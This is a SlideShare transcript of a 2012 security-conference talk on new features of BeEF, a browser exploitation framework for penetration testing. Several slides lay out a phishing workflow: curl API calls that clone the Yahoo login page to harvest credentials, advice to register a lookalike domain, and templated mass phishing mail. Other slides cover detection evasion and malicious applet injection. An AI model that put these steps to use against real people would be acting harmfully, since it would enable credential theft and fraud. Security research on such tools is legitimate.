• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content




Brief intro to BeEF

Brief intro to BeEF

New core features: RESTful API, WebSockets, HTTPS

New extensions:
Evasion, Social Engineering



Total Views
Views on SlideShare
Embed Views



3 Embeds 14

https://twitter.com 12
http://twitter.com 1
https://si0.twimg.com 1



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    BeEF_EUSecWest-2012_Michele-Orru BeEF_EUSecWest-2012_Michele-Orru Presentation Transcript

    • BeEF, the BrowserExploitation Framework What’s new from 2011 EUSecWest - 19 Sept 2012 Michele “antisnatchor” Orru
    • Who am I• Lead core developer of BeEF• Application Security Researcher• OpenBSD, Ruby and Javascript addicted• Senior Security Consultant @ Trustwave SpiderLabs
    • Outline• Brief intro to BeEF• New core features: • RESTful API, WebSockets, HTTPS• New extensions: • Evasion, Social Engineering
    • Meet BeEF• Browser Exploitation Framework• Pioneered by Wade Alcorn in 2005• Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse.• The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context.
    • RESTful API• The truth is: • I hate SOAP • I hate XML-RPC • I love to use protocol (HTTP) features without reinventing the wheel
    • RESTful APIRuby + Sinatra + JSONget ‘/to/a/pub’ “BeER please”end
    • RESTful API• Facts: • programmatically control BeEF with whatever eats HTTP and JSON • integration is much easier • add your custom logic is much easier
    • RESTful API demo: Java mass-pwner• Fingerprint hooked browsers• Achieve different forms of persistence• Inject an (unsigned) applet to determine exact JVM version/ architecture/platform• Inject a second applet to launch a targeted attack with a malicious payload
    • WebSockets• HTML5 specification introduces new features, including WebWorkers and WebSockets• WebSockets enable (almost) real-time communication between your webapp users and the backend• Streaming protocol, up to 2MB/ message in latest browsers
    • WebSocketsXHR-polling
    • WebSocketsXHR-polling WebSocket
    • WebSockets• Server-side: event-based server• Client-side: WebSocket (or MozWebSocket, damn prefixes #$%) objects exposed via Javascript• If the victim browsers supports the technology, protocols are switched• Not (yet) enabled by default in BeEF: we’re still testing it
    • WebSockets• WebSockets open new horizons: • faster Tunneling Proxy (10x faster) • real-time VNC-like hooked browser control • generally faster communication
    • WebSockets demo• BeEF Tunneling Proxy with and without WebSockets • exploiting a SQLi with sqlmap through the tunneling proxy with WebSockets
    • HTTPS/WSS• BeEF supports HTTPS and WebSocketSecure, you just need to specify your certificate• Motivation: • STS support implemented in latest browsers (see Mixed Scripting) • prevent filtering if an SSL-proxy is not used
    • HTTPS/WSS• About STS • Strict Transport Security, meaning that : • see http://blog.chromium.org/2012/08/ ending-mixed-scripting-vulnerabilities.html hooked domain:https://linkedin.com The browser will deny loading a script from a BeEF: non-https resource http://beef.com
    • HTTPS/WSS• About STS • Strict Transport Security, meaning that : • see http://blog.chromium.org/2012/08/ending- mixed-scripting-vulnerabilities.html hooked domain: https://linkedin.com This will work! BeEF: https://beef.com
    • Evasion Extension• Motivation: • decrease the likelihood that the BeEF hook injection and communication will be detected • by machines (network filters) • by humans
    • Evasion Extension• define your own technique, specify if they need a bootstrapper• define the technique chain
    • Social Eng. extension• The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate: • sending phishing emails using templates, • cloning webpages, harvesting credentials • client-side pwnage
    • AND... WE DID IT!
    • Social Eng. extension
    • Social Eng. extension: web_cloner• Clone a webpage and serve it on BeEF, then automatically: • modify the page to intercept POST requests • add the BeEF hook to it • if the page can be framed, after POST interception load the original page on an overlay iFrame, otherwise redirect to original page
    • Social Eng. extension: web_cloner • curl -H "Content-Type: application/json; charset=UTF-8" -d {"url":"https:// login.yahoo.com/config/login_verify2", "mount":"/"} -X POST http://<BeEF>/api/ seng/clone_page? token=53921d2736116dbd86f8f7f7f10e46f1• If you register loginyahoo.com, you can specify a mount point of /config/ login_verify2, so the phishing url will be (almost) the same
    • Social Eng. extension: web_cloner • Demo
    • Social Eng. extension: mass_mailer• Do your phishing email campaigns • get a sample email from your target (with company footer...) • copy the HTML content in a new BeEF email template • download images so they will be added inline! • add your malicious links/attachments • send the mail to X targets and have fun
    • Social Eng. extension: mass_mailer • email templates structure
    • Social Eng. extension: mass_mailer• ‘default’ template HTML mail
    • Social Eng. extension: mass_mailer will look• how the ‘default’ template email
    • Social Eng. extension: mass_mailer • curl -H "Content-Type: application/json; charset=UTF-8" -d body -X POST http://<BeEF>/api/ seng/send_mails?token=0fda00ea62a1102f{ "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF", "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com", "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor"}]}
    • Social Eng. extension: mass_mailer • Demo
    • Social Eng. extension Combine everything FTW• Register your phishing domain• Point the A/MX records to a VPS where you have an SMTP server and BeEF• Create a BeEF RESTful API script that: • Clone a webpage link with web_cloner • Send X emails with that link with mass_mailer • Script intelligent attacks thanks to BeEF browser detection
    • Unfortunately...• There were so many changes from 2011 that we can’t cover them all in a one hours long talk• Other interesting extensions: QRcode, CustomHook, Notification• Other interesting core features: web imitation, cleaner/better code :D• Tens of new modules: we now have 125 modules (and counting :-)
    • Thanks• Wade to be always awesome• The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather• A few new project joiners: Bart Leppens, gallypette, Quentin Swain• Tom Neaves for captain hook images :D
    • Questions?